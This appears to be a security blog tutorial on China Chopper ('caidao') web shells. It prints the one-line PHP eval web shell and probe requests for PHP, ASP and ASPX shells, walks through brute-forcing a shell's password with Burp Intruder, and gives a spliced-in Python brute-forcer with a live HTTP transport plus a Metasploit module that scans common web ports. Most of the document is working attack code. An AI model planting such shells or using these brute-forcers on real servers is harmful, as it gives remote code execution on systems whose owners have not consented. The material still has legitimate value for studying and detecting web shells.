Backdoor Request
PHP Backdoor: <?php @eval($_POST["op"]);?>
The name of the POST parameter ("op" here; $_POST keys are case-sensitive) is the backdoor's password, and its value is the PHP code that gets evaluated.
HTTP Request:
POST /bk.php
....
op=phpinfo();
If it succeeds, the response is the phpinfo() page.
ASP Backdoor:
HTTP Request:
POST /bk.asp
op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.end")
If it succeeds, the response body contains 'woo5woo' (Len("admin") is 5).
ASPX Backdoor:
HTTP Request:
POST /bk.aspx
op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")
If it succeeds, the response body contains 'woo5woo'.
Crack a php backdoor
For example, we will crack the caidao php backdoor step by step.
1. Create an HTML login form that POSTs to the backdoor, to learn how the php backdoor is used: the password is the name of the POST parameter, and the code to run is its value.
2. Click the link labelled "Click Here" and capture the HTTP request in Burp Suite.
3. Send it to Intruder and mark the parameter name "adminadmin" as the Intruder payload position; run it with a password wordlist and look for the one response that contains the probe's output (phpinfo() output, or the 'woo5woo' marker).
Bingo! The password is 'adminadmin'. Now we can do the same with metasploit, as follows.
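The brute-force loop behind the two sections above, as an added example that is not part of the original post and not the metasploit module below: it builds the probe payload and its expected marker for each backdoor type, sends every candidate password as the POST parameter name, and treats the response that echoes the marker as the hit. The fake_php_backdoor function is a constructed stand-in for the remote <?php @eval($_POST[...]); ?> so the example runs offline; http_send is an assumed transport showing how the same loop would be pointed at a real host (not exercised here). The wordlist and the secret "adminadmin" are constructed.

```python
import re
import secrets
import string
import urllib.parse
import urllib.request


def make_probe(backdoor_type, junk=None):
    """Return (payload, marker) for a caidao-style backdoor of the given type.

    The payload makes the backdoor print junk + len(junk) + junk, so a valid
    password is recognised by a string that cannot appear on the page by
    accident. Random junk is generated unless one is supplied (for testing).
    """
    if junk is None:
        alphabet = string.ascii_letters + string.digits
        junk = "".join(secrets.choice(alphabet) for _ in range(4))
    n = len(junk)
    marker = f"{junk}{n}{junk}"
    if backdoor_type == "PHP":
        payload = f'$_="{n}";echo "{junk}".$_."{junk}";'
    elif backdoor_type == "ASP":  # classic ASP / VBScript: Len()
        payload = (f'execute("response.write(""{junk}""):'
                   f'response.write(Len(""{junk}"")):'
                   f'response.write(""{junk}""):response.end")')
    elif backdoor_type == "ASPX":  # C#: String.Length
        payload = (f'Response.Write("{junk}");'
                   f'Response.Write("{junk}".Length);'
                   f'Response.Write("{junk}")')
    else:
        raise ValueError(f"unsupported backdoor type: {backdoor_type}")
    return payload, marker


def build_body(password, payload):
    """The candidate password is the POST parameter NAME; the code is its value."""
    return urllib.parse.urlencode({password: payload})


def is_hit(status, body, marker):
    """A correct password echoes the marker; a wrong one returns the plain page."""
    return status == 200 and marker in body


def fake_php_backdoor(secret_key, form_body):
    """Constructed stand-in for <?php @eval($_POST["secret_key"]); ?>.

    It only understands the echo probe built by make_probe("PHP"); a request
    without the right parameter name behaves like @eval(null): a silent,
    ordinary 200 page with no marker in it.
    """
    fields = urllib.parse.parse_qs(form_body)
    if secret_key not in fields:
        return 200, "<html><body></body></html>"
    code = fields[secret_key][0]
    m = re.fullmatch(r'\$_="(\d+)";echo "(\w+)"\.\$_\."(\w+)";', code)
    if not m:
        return 200, "<html><body>parse error</body></html>"
    return 200, m.group(2) + m.group(1) + m.group(3)


def http_send(url):
    """Assumed transport for a real target: POST the form body to url and
    return (status, body). Not exercised in this offline example."""
    def send(form_body):
        req = urllib.request.Request(url, data=form_body.encode(), method="POST")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    return send


def brute_force(wordlist, backdoor_type, send):
    """Try each candidate as the parameter name; return the first one whose
    response echoes the marker, or None. One probe per candidate, and a fresh
    random marker per run so a cached or static page cannot fake a hit."""
    payload, marker = make_probe(backdoor_type)
    for candidate in wordlist:
        status, body = send(build_body(candidate, payload))
        if is_hit(status, body, marker):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed secret and wordlist; replace the lambda with
    # http_send("http://target/bk.php") to run the loop against a real backdoor.
    secret = "adminadmin"
    wordlist = ["admin", "123456", "password", "adminadmin", "cmd"]
    found = brute_force(wordlist, "PHP",
                        lambda body: fake_php_backdoor(secret, body))
    print("password:", found)
```

The random marker is the point of the "junk4junk" trick: checking for a fixed string such as "woo5woo" would false-positive on any page that happens to contain it, and a marker chosen per run also cannot be matched by a stale cached response.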
Crack backdoors with metasploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Chinese Caidao Backdoor Bruteforce',
      'Description' => 'This module attempts to brute force the password of a Chinese caidao php/asp/aspx backdoor.',
      'Author'      => [ 'Nixawk' ],
      'References'  =>
        [
          [ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329' ]
        ],
      'License'     => MSF_LICENSE
    ))

    register_options([
      OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
      OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ]),
      OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
    ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  # The caidao "password" is the name of the POST parameter whose value gets
  # eval'ed, so each guess is sent as "<pass>=<payload>". The backdoor ignores
  # the user field; it is only there so AuthBrute's user/pass iteration works.
  def backdoor_brute(uri, user, pass, payload, match)
    begin
      res = send_request_cgi({
        'uri'       => uri,
        'method'    => 'POST',
        'vars_post' => {
          'user' => user,
          pass   => payload   # URL-encoded by send_request_cgi
        }
      })
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      print_error("#{peer} - Service failed to respond")
      return :abort
    end

    vprint_status("#{peer} - brute force caidao password: \"#{pass}\"")

    # A hit is the page echoing our random marker back; with a wrong password
    # @eval() evaluates nothing and the ordinary page comes back.
    if res && res.code == 200 && res.body.include?(match)
      print_good("#{peer} - Successful login: password - \"#{pass}\"")
      return :next_user
    end

    return
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    # Random junk so the expected output cannot match by accident.
    junk  = Rex::Text.rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when 'PHP'
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";"
    when 'ASP'
      # VBScript: Len() of the 4-character junk string
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"
    when 'ASPX'
      # C#: String.Length, not VBScript's Len()
      payload = "Response.Write(\"#{junk}\");Response.Write(\"#{junk}\".Length);Response.Write(\"#{junk}\")"
    else
      print_error("#{peer} - Backdoor type is not supported")
      return
    end

    each_user_pass do |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    end
  end
end